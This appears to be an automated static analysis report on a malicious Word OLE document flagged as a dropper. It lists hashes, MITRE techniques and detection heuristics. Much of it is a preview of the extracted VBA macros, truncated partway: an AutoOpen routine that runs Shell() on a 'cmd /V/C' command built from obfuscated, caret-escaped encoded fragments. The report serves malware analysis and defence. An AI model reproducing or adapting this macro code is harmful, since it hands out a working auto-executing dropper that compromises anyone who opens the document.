Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b9da3c2e9096f55f…

MALICIOUS

Office (OLE)

84.2 KB First seen: 2019-05-16
MD5: af6abe3561c428edbf227bd39fd70857 SHA-1: bcfb0ca77f0ad8c5c9d52fef54901fd9d23c9444 SHA-256: b9da3c2e9096f55fc8387617187315084ae4d584a385bc180b5a8e8713f181b3
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing VBA macros. A critical heuristic firing indicates the presence of a Shell() call within the VBA code, which is commonly used to execute arbitrary commands. The AutoOpen macro is present, suggesting immediate execution upon opening. The ClamAV detection 'Doc.Dropper.Sagent-6667985-0' further supports its malicious nature as a dropper.

Heuristics 6

  • ClamAV: Doc.Dropper.Sagent-6667985-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Sagent-6667985-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9188 bytes
SHA-256: 4dd914e699138747d7209f0b99ff9c1ffae272c77fe9a01c45b5bf8604a62cde
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "DCIoViP"
Sub AutoOpen()

On _
Error _
Resume _
Next
   Hour wMYuAz / 89028
   Hour DLwoM / RwBhm / UAXEMG * StaWj
   Hour CwtOJQ * lGwocr
   Hour vKwmZ / GmUUJS
Shell ChrW(12 + 4 + 1 + 5 + 45) + pnfJDwIQAmMF + ICHcPcpPK + MRvkQL + umRtWz + vITao + mniwZMU + iBtkfQR + FXHhpsszl + bBPuSFirjq, 481116151 - 481116151
   Hour 37634 * 16713 * CjaFNU / jjTja
   Hour OszaAj * 20875
   Hour 15520 / wqRMaz
End Sub



Attribute VB_Name = "bHhJoJVkjaA"
Function MRvkQL()

On _
Error _
Resume _
Next
Hour 18813 * rDzaa / sRdkb * 56990
   Hour 52298 / brvId
   Hour 98170 / 5979
   Hour 93826 / lLlIb
   Hour 58048 * PSTzAY
rnwIiB = "md" + " /" + "V/C" + Chr(4 + 1 + 3 + 5 + 21) + "^" + "s^et ^" + "5K^oY=" + "AAC"
Hour zufTJ / sPiiNJ * HHGrtK / XmIbC
   Hour rSVVX * ipdRV
LKbZwRbqKVT = "A^g^A" + "AIAAC^A" + "gA^AI" + "^AACA" + "^" + "g^AA" + "I^A^AC^" + "A^gA^A^" + "I^AAC^" + "A^gA^" + "A^I^" + "AAC^A" + "gA^Q"
Hour lYKDqL * DRvqlz
   Hour SjOWd * IoHLnw
   Hour 13847 / zZJaC
   Hour Ejhmi / Liolid
MiGGcwqb = "fA^0H^A" + "7^BA^a" + "^A^M^G^" + "A0" + "^B^Q" + "Y^AMG^A" + "^9^B" + "w^OAs" + "GA" + "hBQ^Z^A" + "IH^A^iB"
Hour ZTfBNZ * FLWcu / wLIsq / jQPVA
   Hour 85837 * XkDcFJ / 79039 * atVSIh
   Hour 83767 / KkjLBw / 45172 * JnOPT
   Hour 77815 / HcFDcV
OADXutEzck = "^wO" + "^A^w^" + "GAN^" + "BQb^AQ" + "C^A^gAQ" + "^b^" + "A^U" + "^G^A^0" + "^B^Q^" + "S"
Hour GZnwdG / 36176
   Hour 53 / rizjzQ / juVdiN * SaiSJ
zToUJvniTO = "^A" + "0C^" + "A" + "l^B^" + "w^aA8G"
Hour 8551 / GRfzK
   Hour 24529 / CUlFJk * 39266 / QjUbX
   Hour GLIALI * TzmTA / 36107 * ZPflB
uUAHjhCm = "^A2B^g" + "bAkE" + "^A^7A^Q" + "K" + "^Aw" + "GAN^B" + "Q" + "^b^A^" + "QC" + "A^gA" + "^ALA"
Hour 13143 / SwpVnj
   Hour 69242 / 3376
   Hour GjXNb * wnhaIo
TQcOjvoL = "Q^E^A^0" + "Bg^e" + "^A^QC^" + "Ao^" + "A^QZ^" + "Aw^" + "G" + "Ap^B^" + "gR" + "AQGA" + "h"
Hour NGiihh / zOPJzS
   Hour 59246 * HNVrIj
JHVRhm = "Bw" + "bA^w^G^" + "AuB^" + "w^" + "d^A8^G" + "^" + "AE^B" + "^g^L^A" + "MHA" + "tBAVAQ" + "CA^7^B" + "^Q^e^"
MRvkQL = rnwIiB + LKbZwRbqKVT + MiGGcwqb + OADXutEzck + zToUJvniTO + uUAHjhCm + TQcOjvoL + JHVRhm
   Hour pZZPv / 40997
End Function
Function umRtWz()

On _
Error _
Resume _
Next
Hour QvNzCj * jhsEO / 61338 * Cbswj
   Hour FPzcY * NnrHnw * 40361 * qLWoTo
   Hour 83245 / HIPBTa * 37186 * hHXXw
   Hour PfTFR * jIVFsG / 75331 / wwmnv
TiENB = "AI" + "^HA0^B^" + "w^e^A" + "kC" + "^Ar^" + "B^Q" + "^T" + "^AcEA^k" + "A^" + "AI" + "A^4^" + "GA^p" + "BAI^A^"
Hour 35269 / uUXuj
   Hour PrvAji * BWPhvJ
   Hour 330 * jPYKz * ITSUmh * 74136
TYuYZakJlKs = "Q^EA0^B" + "g^e" + "A^Q" + "C^A^oA" + "A^a" + "A^M^" + "G^"
Hour qYpWT / SFCJu / 82951 / 58160
   Hour 84463 / HkpKai
   Hour MwwJiW * NUBRKJ
   Hour 81561 / wTiAG * YZVJu / LFjDRI
PipfGatdikZ = "AhB" + "^QZ^A" + "^I^" + "H" + "AvBg^" + "Z" + "AsD^An" + "A" + "Q^" + "ZA^" + "g^"
Hour 18793 / FTzki / LUUCG * HKRnG
   Hour ViqRT / DDBFwL * 42049 / amYIz
   Hour 80361 * TXMPCG
JvHqUX = "H^A^l" + "^" + "BgL^AcC" + "^Ar^" + "A^w" + "Y" + "^A" + "cFAw" + "BA^" + "J" + "^A^s"
Hour 4094 / tbLJOW
   Hour 70526 / jXtfH * 58387 / GZCmk
   Hour 28709 / nijjM / 25640 / bwQcoo
VMrINN = "C^An^A" + "A^X^AcC" + "Ar^" + "A" + "^w^" + "Y^A^k^" + "G^A^s"
Hour 81619 * iCutL * 73703 * WcGjk
iTTaXWKbA = "Bg" + "Y" + "A^UHAwB" + "^g" + "^O^A" + "Y^" + "H^A^" + "uBQZ^" + "AQCA9"
Hour nwafq / wpmLh * 29355 / PvlkU
zlhazp = "^AA^b" + "^A^" + "0^EA" + "^t" + "BAJA^s" + "D^An^A^" + "A" + "MAUD^A" + "2A^" + "wJA^ACA" + "^9^" + "A"
Hour 37630 * qwuzXD
ulCQUSP = "AIA" + "MGA^" + "X^B^Ac^" + "A^" + "QC"
Hour 70925 * dtorif / aQJEYU * CGpIRX
   Hour 32444 * 42522 * vQATnI / CaJbpZ
   Hour Bilzlh * AFiNH * iXMGjV / PBKzqH
FioFZrj = "^A7A^Q^" + "K^AcCAA" + "Bw^" + "JAgC^" + "A0^B" + "Q^aAw^" + "GAwB^wU" + "A^4"
Hour 8087 * WJwOf * 33573 / HfBzLX
   Hour lmqXRb / DIrAzN
tXYTDWbJh = "C" + "^An" + "^A" + "^QSA" + "^MEA" + "^y^B^" + "g" + "^b^A8" + "CA^4"
Hour 85626 * FqzBMk / 11484 / vQHQz
   Hour FSlAa / OTVzLw / ipNFO * QSpTU
   Hour 
... (truncated)